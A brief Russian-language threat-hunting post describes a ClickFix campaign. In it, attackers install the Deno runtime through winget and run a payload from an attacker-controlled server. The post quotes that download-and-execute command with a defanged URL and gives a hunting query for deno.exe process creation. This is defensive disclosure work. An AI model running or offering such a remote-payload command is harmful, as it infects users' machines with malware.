Сегодня поговорим о JavaScript (T1059.007) и о том, как атакующие злоупотребляют легитимной средой его выполнения.
В рамках очередной ClickFix-кампании, злоумышленники использовали довольно интересные техники. Во-первых, они использовали
winget.exe для загрузки и инсталляции среды выполнения Deno. Во-вторых, использовали Deno для запуска вредоносной нагрузки с удаленного сервера, подконтрольного атакующим:deno.exe run -A hxxp://webstizkgao[.]com/v020def066f14754be9.js
Кажется, злонамеренное использование Deno может быть отличной целью для проактивного поиска:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "deno.exe"
AND
cmdline: "run"
Скоро увидимся!
English version
